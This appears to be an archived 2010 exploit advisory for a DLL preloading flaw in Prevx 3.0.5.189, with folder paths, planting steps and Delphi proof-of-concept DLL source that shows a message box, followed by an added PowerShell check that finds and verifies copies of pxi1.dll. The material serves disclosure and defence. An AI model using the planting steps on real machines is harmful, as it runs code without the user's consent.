
[local exploits] - Prevx DLL preloading exploit

Posted on 11 September 2010

====================================================
=          PREVX DLL PRELOADING EXPLOIT            =
====================================================

Exploit Title : [Prevx DLL preloading exploit]
Date          : [11 Sept 2010]
Author        : [STRELiTZIA]
Software      : [Prevx 3.0.5.189]
Tested on     : [Windows XP SP3]

============================
=       Description        =
============================
Prevx searches for and loads the "pxi1.dll" library without checks and without any visual warning about modifications to the library.
This vulnerability can allow attackers to execute malicious code locally, without user consent, in the privilege context of the targeted application.

============================
=       Instructions       =
============================
Default search folders:
C:\WINDOWS\pxi1.dll
C:\WINDOWS\system\pxi1.dll
C:\WINDOWS\system32\pxi1.dll
C:\WINDOWS\system32\wbem\pxi1.dll

Additional folders, if they exist:
C:\Program Files\Borland\Delphi7\Bin\pxi1.dll
C:\Program Files\Borland\Delphi7\Projects\Bpl\pxi1.dll
C:\Documents and Settings\All Users\Documents\RAD Studio\7.0\Bpl\pxi1.dll

1- Copy "Test.dll" into one of the listed folders
2- Rename "Test.dll" to "pxi1.dll"

============================
=          Tests           =
============================
- Launch Prevx.
- Restart your PC.

============================
= Test Dll Source "Delphi" =
============================
library Test;

uses
  Windows;

begin
  // Library initialization code: runs when the DLL is loaded and only
  // shows a message box as proof that the code executed.
  MessageBoxA(
    0,
    PChar('Yep, I''m running in your system without your permission.'),
    PChar('Sample'),
    MB_ICONSTOP
  );
end.

# Inj3ct0r.com (http://inj3ct0r.com/) [2010-09-11]
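A defensive check for the condition described above, as an added example that is not part of the original advisory: it looks for a file named pxi1.dll in the listed system folders and in every %PATH% folder, and reports each copy's hash, Authenticode status and owner. It assumes PowerShell 4.0 or later, and that the advisory's "additional folders" are PATH entries on the tester's machine.

```powershell
# Added example, not from the advisory: find copies of pxi1.dll on the DLL search path.
$DllName = 'pxi1.dll'    # library name taken from the advisory

# System folders listed in the advisory, plus every %PATH% entry.
# Assumption: the advisory's "additional folders" came from the tester's PATH.
$candidates = @(
    $env:windir
    (Join-Path $env:windir 'system')
    (Join-Path $env:windir 'system32')
    (Join-Path $env:windir 'system32\wbem')
) + ($env:Path -split ';')

# Build the full candidate file paths and drop duplicates (case-insensitive).
$files = $candidates |
    Where-Object { $_ -and $_.Trim('" ') } |
    ForEach-Object { [System.IO.Path]::Combine($_.Trim('" '), $DllName) } |
    Sort-Object -Unique

$findings = foreach ($file in $files) {
    if (-not (Test-Path -LiteralPath $file -PathType Leaf)) { continue }

    $sig = Get-AuthenticodeSignature -LiteralPath $file
    [pscustomobject]@{
        Path        = $file
        SHA256      = (Get-FileHash -LiteralPath $file -Algorithm SHA256).Hash
        Signature   = $sig.Status    # Valid, NotSigned, HashMismatch, ...
        Signer      = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject }
        Owner       = (Get-Acl -LiteralPath $file).Owner
        ModifiedUtc = (Get-Item -LiteralPath $file).LastWriteTimeUtc
    }
}

if ($findings) {
    $findings | Format-List
    # Any copy whose signature does not validate deserves investigation.
    $findings | Where-Object { $_.Signature -ne 'Valid' } |
        ForEach-Object { Write-Warning "Signature not valid: $($_.Path)" }
} else {
    "No $DllName found in $($files.Count) candidate locations."
}
```

A copy signed by an unexpected publisher also warrants review, so compare the Signer column against the vendor's known certificate subject.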

 
